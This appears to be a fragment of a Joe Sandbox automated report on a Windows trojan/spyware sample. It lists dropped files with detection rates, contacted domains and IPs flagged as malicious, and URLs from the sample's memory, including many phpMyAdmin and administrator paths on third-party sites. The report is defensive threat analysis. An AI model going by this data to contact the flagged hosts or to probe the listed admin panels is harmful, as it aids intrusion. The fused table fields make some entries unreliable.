C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_RegDLL.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-EHUIS.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nss46EF.tmp\INetC.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\nsx5151.tmp | 34% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\SDL2.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\avcodec-58.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\avformat-58.dll (copy) | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\avutil-56.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-0PI80.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-13K5P.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1HD49.tmp | 3% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-1P6UB.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-399KA.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-A87KG.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-F43KE.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-GIJA5.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-HCHL2.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJ17E.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-IJL2N.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-OFQS5.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-S9GPV.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\is-VN2OC.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libbz2-1.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libgcc_s_dw2-1.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libiconv-2.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libogg-0.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbis-0.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libvorbisenc-2.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\libwinpthread-1.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\swresample-3.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\VB Smart Card Viewer\zlib1.dll (copy) | 0% | ReversingLabs | |
C:\Users\user\AppData\Roaming\rghwvve | 45% | ReversingLabs | Win32.Trojan.CrypterX |

No Antivirus matches
                                                                                                                103.94.204.46
                                                                                                                truetrue
                                                                                                                  unknown
                                                                                                                  trmpc.com
                                                                                                                  2.180.10.7
                                                                                                                  truetrue
                                                                                                                    unknown
                                                                                                                    instructory.net
                                                                                                                    36.255.71.45
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      www2.personas.santander.com.ar
                                                                                                                      200.61.38.87
                                                                                                                      truetrue
                                                                                                                        unknown
                                                                                                                        hartico.com
                                                                                                                        172.67.184.59
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          discord.com
                                                                                                                          162.159.136.232
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            mw.redsa.net
                                                                                                                            77.240.114.212
                                                                                                                            truetrue
                                                                                                                              unknown
                                                                                                                              real.avalmag.com
                                                                                                                              172.67.213.22
                                                                                                                              truetrue
                                                                                                                                unknown
                                                                                                                                mx3.name.com
                                                                                                                                173.192.7.98
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  adf.ly
                                                                                                                                  172.66.40.139
                                                                                                                                  truefalse
                                                                                                                                    high
                                                                                                                                    mx1.hostinger.com
                                                                                                                                    172.65.182.103
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      casinocontroller.com
                                                                                                                                      104.22.43.158
                                                                                                                                      truefalse
                                                                                                                                        high
                                                                                                                                        pxndx-mcr.boletia.com
                                                                                                                                        54.85.194.183
                                                                                                                                        truefalse
                                                                                                                                          high
                                                                                                                                          mailgw.nic.in
                                                                                                                                          164.100.2.66
                                                                                                                                          truetrue
                                                                                                                                            unknown
                                                                                                                                            secretionsuitcasenioise.shop
                                                                                                                                            104.21.16.152
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              mx.zoho.com
                                                                                                                                              204.141.43.44
                                                                                                                                              truefalse
                                                                                                                                                high
                                                                                                                                                gemcreedarticulateod.shop
                                                                                                                                                172.67.152.52
                                                                                                                                                truetrue
                                                                                                                                                  unknown
                                                                                                                                                  084725.parkingcrew.net
                                                                                                                                                  76.223.26.96
                                                                                                                                                  truefalse
                                                                                                                                                    high
                                                                                                                                                    s163-es.ogame.gameforge.com
                                                                                                                                                    79.110.82.173
                                                                                                                                                    truefalse
                                                                                                                                                      high
                                                                                                                                                      innovationdevelopment.eu
                                                                                                                                                      185.51.191.48
                                                                                                                                                      truetrue
                                                                                                                                                        unknown
                                                                                                                                                        opsu.terna.net
                                                                                                                                                        104.21.5.25
                                                                                                                                                        truefalse
                                                                                                                                                          high
                                                                                                                                                          d2dbdn71e1vorj.cloudfront.net
                                                                                                                                                          3.161.136.69
                                                                                                                                                          truefalse
                                                                                                                                                            high
                                                                                                                                                            tiktok.com
                                                                                                                                                            13.249.120.86
                                                                                                                                                            truetrue
                                                                                                                                                              unknown
                                                                                                                                                              star-mini.c10r.facebook.com
                                                                                                                                                              31.13.88.35
                                                                                                                                                              truefalse
                                                                                                                                                                high
Name, Malicious, Antivirus Detection, Reputation
Name    Source    Malicious    Antivirus Detection    Reputation
                                                                                                                                                                                                                                                        https://store.steampowered.com/app/271590/Grand_Theft_Auto_V/?snr=1_4_4__tab-TopGrossing572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                          http://steamcommunity.com/administrator/e572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                            https://login2.innova.puglia.it/phpmyadmin/Fz572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://www.cloudflare.com/5xx-error-landingFE8B.exe, 00000007.00000003.2450711514.0000000001187000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000003.2450496543.000000000118A000.00000004.00000020.00020000.00000000.sdmp, FE8B.exe, 00000007.00000002.2647046758.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.3906194985.00000000640EC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4184636529.0000000047AB3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4387562949.00000000403AE000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B19000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039199000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304456912.0000000040090000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063DEC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4388544265.000000004012C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4072180672.0000000047B22000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4307098588.00000000061B3000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E073000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4513550067.000000004E067000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.000000004015F000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 
00000009.00000003.4304769446.00000000402AF000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4084235981.0000000040855000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                              http://loopex.io/administrator/index.phpdex.php572.exe, 00000009.00000003.4347804108.000000004E4B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://store.steampowered.com/app/2072450/Like_a_Dragon_Infinite_Wealth/?snr=1_4_4__145572.exe, 00000009.00000003.4452919003.0000000063FDB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                https://images.ctfassets.net572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                  http://accounts.snapchat.com/phpmyadmin/)Nq6572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                    http://etd.lib.tuke.sk/administrator//572.exe, 00000009.00000003.4286826015.000000007FDE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                      https://store.steampowered.com/app/1861440/CLeM/?snr=1_4_4__tab-Upcoming572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                        https://store.steampowered.com/tags/en/Adventure/?snr=1_4_4__125572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4054751612.000000004066B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040373000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4238582525.0000000047A07000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                          http://testconnect.garena.com/phpmyadmin/572.exe, 00000009.00000003.4579113128.0000000005658000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                            https://hu.bongacams.com/phpmyadmin572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                              https://store.steampowered.com/?snr=1_4_4__login572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                http://secure.imvu.com/common/withme/img/favicon/favicon-16x16.png572.exe, 00000009.00000003.4373730161.0000000063E6B000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373068023.0000000047B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                  https://us-central1-gcp.api.snapchat.com572.exe, 00000009.00000003.4054751612.0000000040683000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                    https://store.steampowered.com/category/horror/?snr=1_4_4__12572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                                                      https://gitam.zoom.us/download#room_client572.exe, 00000009.00000003.4040528090.000000004047D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                                                        http://sigapbanjarmasin.info/phpmyadmin/ndes.edu.co572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://account.booking.com/administrator/572.exe, 00000009.00000003.4337138614.000000004DAE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                                                                          https://store.steampowered.com/app/1329360/Lords_of_Exile/?snr=1_4_4__tab-Upcoming572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                                                                            https://pl.bongacams.com/phpmyadmin572.exe, 00000009.00000003.4101727130.000000004E6AC000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4306089773.000000004E722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                                                                              https://store.steampowered.com/category/tower_defense/?snr=1_4_4__12572.exe, 00000009.00000003.4070644791.0000000064023000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4018148306.0000000064082000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.000000006400F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                                                                http://ssl-es.hoteles.com/administrator/l572.exe, 00000009.00000003.4307098588.00000000061EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                                                                  https://store.steampowered.com/app/881020/Granblue_Fantasy_Relink/?snr=1_4_4__145572.exe, 00000009.00000003.4403049090.0000000063AB2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4116850933.000000004082C000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464256901.0000000063ABB000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4373730161.0000000063E06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                                                                    https://sii.ittlahuac.edu.mx/phpmyadmin/0)vI572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://webstatic-sea.hoyoverse.com/upload/static-resource/2021/10/15/bff105936d378d5335b3fddd9c1662572.exe, 00000009.00000003.4298111023.000000004069A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                    • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                                                                                                                                                                                    25233AWALNET-ASNSAtrue
                                                                                                                                                                                                                                                                                                    185.120.71.26
                                                                                                                                                                                                                                                                                                    unknownCzech Republic
                                                                                                                                                                                                                                                                                                    8646CLOUDINFRASTACKCZfalse
                                                                                                                                                                                                                                                                                                    185.120.71.25
                                                                                                                                                                                                                                                                                                    unknownCzech Republic
                                                                                                                                                                                                                                                                                                    8646CLOUDINFRASTACKCZfalse
                                                                                                                                                                                                                                                                                                    3.134.125.175
                                                                                                                                                                                                                                                                                                    3fba-180-252-166-236.ngrok.ioUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                    47.251.24.188
                                                                                                                                                                                                                                                                                                    cjdropshipping.comUnited States
                                                                                                                                                                                                                                                                                                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                                                                                                                                    179.191.175.70
                                                                                                                                                                                                                                                                                                    unknownBrazil
                                                                                                                                                                                                                                                                                                    52580AzionTechnologiesLtdaBRtrue
                                                                                                                                                                                                                                                                                                    172.66.43.168
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    104.26.14.180
                                                                                                                                                                                                                                                                                                    aeaaamorim.inovarmais.comUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    77.88.21.249
                                                                                                                                                                                                                                                                                                    mx.yandex.netRussian Federation
                                                                                                                                                                                                                                                                                                    13238YANDEXRUtrue
                                                                                                                                                                                                                                                                                                    8.45.52.146
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    17639CONVERGE-ASConvergeICTSolutionsIncPHfalse
                                                                                                                                                                                                                                                                                                    8.45.52.148
                                                                                                                                                                                                                                                                                                    genshin.mihoyo.com.w.kunlunsl.comUnited States
                                                                                                                                                                                                                                                                                                    17639CONVERGE-ASConvergeICTSolutionsIncPHtrue
                                                                                                                                                                                                                                                                                                    177.74.1.157
                                                                                                                                                                                                                                                                                                    sistemas.pa.gov.brBrazil
                                                                                                                                                                                                                                                                                                    53016PRODEPA-EmpTecdaInfeComdoEstadodoParaBRtrue
                                                                                                                                                                                                                                                                                                    13.248.169.48
                                                                                                                                                                                                                                                                                                    secure.vexcorp.comUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                    200.11.221.13
                                                                                                                                                                                                                                                                                                    unknownVenezuela
                                                                                                                                                                                                                                                                                                    8048CANTVServiciosVenezuelaVEfalse
                                                                                                                                                                                                                                                                                                    13.249.120.75
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                    34.250.93.112
                                                                                                                                                                                                                                                                                                    kwyk.frUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                    173.194.219.26
                                                                                                                                                                                                                                                                                                    aspmx.l.google.comUnited States
                                                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                    194.169.240.7
                                                                                                                                                                                                                                                                                                    unknownFrance
                                                                                                                                                                                                                                                                                                    43311CCM-BENCHMARK-GROUP-ASFRfalse
                                                                                                                                                                                                                                                                                                    52.87.107.230
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                    138.197.59.199
                                                                                                                                                                                                                                                                                                    cmrsanmartin.ziz.clUnited States
                                                                                                                                                                                                                                                                                                    14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                                                                                                    104.21.60.188
                                                                                                                                                                                                                                                                                                    netizion.comUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    36.110.192.103
                                                                                                                                                                                                                                                                                                    unknownChina
                                                                                                                                                                                                                                                                                                    23724CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporationfalse
                                                                                                                                                                                                                                                                                                    185.172.128.19
                                                                                                                                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                                                                                                                                    50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                                                                                                    172.64.146.103
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    88.99.248.158
                                                                                                                                                                                                                                                                                                    unknownGermany
                                                                                                                                                                                                                                                                                                    24940HETZNER-ASDEfalse
                                                                                                                                                                                                                                                                                                    172.66.40.192
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    47.246.167.169
                                                                                                                                                                                                                                                                                                    lazada-sg-2.lazada.wagbridge.aserver-lazada.alibaba.com.gds.alibabadns.comUnited States
                                                                                                                                                                                                                                                                                                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                                                                                                                                    54.216.244.65
                                                                                                                                                                                                                                                                                                    mx.nexters.comUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                    184.25.164.103
                                                                                                                                                                                                                                                                                                    store.steampowered.comUnited States
                                                                                                                                                                                                                                                                                                    9498BBIL-APBHARTIAirtelLtdINfalse
                                                                                                                                                                                                                                                                                                    205.220.166.26
                                                                                                                                                                                                                                                                                                    mxa-00569201.gslb.pphosted.comUnited States
                                                                                                                                                                                                                                                                                                    26211PROOFPOINT-ASN-US-WESTUSfalse
                                                                                                                                                                                                                                                                                                    43311CCM-BENCHMARK-GROUP-ASFRfalse
                                                                                                                                                                                                                                                                                                    3.22.30.40
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02UStrue
                                                                                                                                                                                                                                                                                                    44.194.231.6
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    14618AMAZON-AESUStrue
                                                                                                                                                                                                                                                                                                    172.67.199.120
                                                                                                                                                                                                                                                                                                    claimconcessionrebe.shopUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    104.21.32.61
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    207.211.30.141
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    30031MIMECAST-UStrue
                                                                                                                                                                                                                                                                                                    172.67.218.172
                                                                                                                                                                                                                                                                                                    www.phonandroid.comUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    172.67.11.168
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    172.67.213.22
                                                                                                                                                                                                                                                                                                    real.avalmag.comUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    172.67.217.100
                                                                                                                                                                                                                                                                                                    resergvearyinitiani.shopUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    186.28.225.16
                                                                                                                                                                                                                                                                                                    service.uan.edu.coColombia
                                                                                                                                                                                                                                                                                                    19429ETB-ColombiaCOtrue
                                                                                                                                                                                                                                                                                                    8.45.52.176
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    17639CONVERGE-ASConvergeICTSolutionsIncPHfalse
                                                                                                                                                                                                                                                                                                    104.26.15.180
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                    52.101.144.0
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                    194.135.86.146
                                                                                                                                                                                                                                                                                                    woomar.hostingas.ltLithuania
                                                                                                                                                                                                                                                                                                    62282RACKRAYUABRakrejusLTfalse
                                                                                                                                                                                                                                                                                                    8.45.52.178
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    17639CONVERGE-ASConvergeICTSolutionsIncPHfalse
                                                                                                                                                                                                                                                                                                    207.211.30.242
                                                                                                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                                                                                                    30031MIMECAST-UStrue
                                                                                                                                                                                                                                                                                                    172.67.152.52
                                                                                                                                                                                                                                                                                                    gemcreedarticulateod.shopUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    64.190.63.136
                                                                                                                                                                                                                                                                                                    sedoparking.comUnited States
                                                                                                                                                                                                                                                                                                    11696NBS11696USfalse
                                                                                                                                                                                                                                                                                                    205.139.110.221
                                                                                                                                                                                                                                                                                                    us-smtp-inbound-2.mimecast.comUnited States
                                                                                                                                                                                                                                                                                                    30031MIMECAST-UStrue
                                                                                                                                                                                                                                                                                                    35.186.223.180
                                                                                                                                                                                                                                                                                                    sigapbanjarmasin.infoUnited States
                                                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                    195.85.23.95
                                                                                                                                                                                                                                                                                                    ro.bongacams.comDenmark
                                                                                                                                                                                                                                                                                                    15411DANISCODKfalse
                                                                                                                                                                                                                                                                                                    3.163.115.86
                                                                                                                                                                                                                                                                                                    connect.appen.comUnited States
                                                                                                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                    104.21.14.245
                                                                                                                                                                                                                                                                                                    ag.ufa9999.comUnited States
                                                                                                                                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                                                                    172.217.197.26
                                                                                                                                                                                                                                                                                                    alt1.aspmx.l.google.comUnited States
                                                                                                                                                                                                                                                                                                    15169GOOGLEUSfalse
IP
127.0.0.1
Joe Sandbox version:39.0.0 Ruby
Analysis ID:1386724
Start date and time:2024-02-05 12:11:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 15m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:44
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:S23UhdW5DH.exe
renamed because original name is a hash value
Original Sample Name:9df4007d210772fc229eefea7f15c06d.exe
Detection:MAL
Classification:mal100.spre.troj.spyw.expl.evad.winEXE@81/130@831/100
EGA Information:
                                                                                                                                                                                                                                                                                                    • Successful, ratio: 90%
                                                                                                                                                                                                                                                                                                    HCA Information:Failed
                                                                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
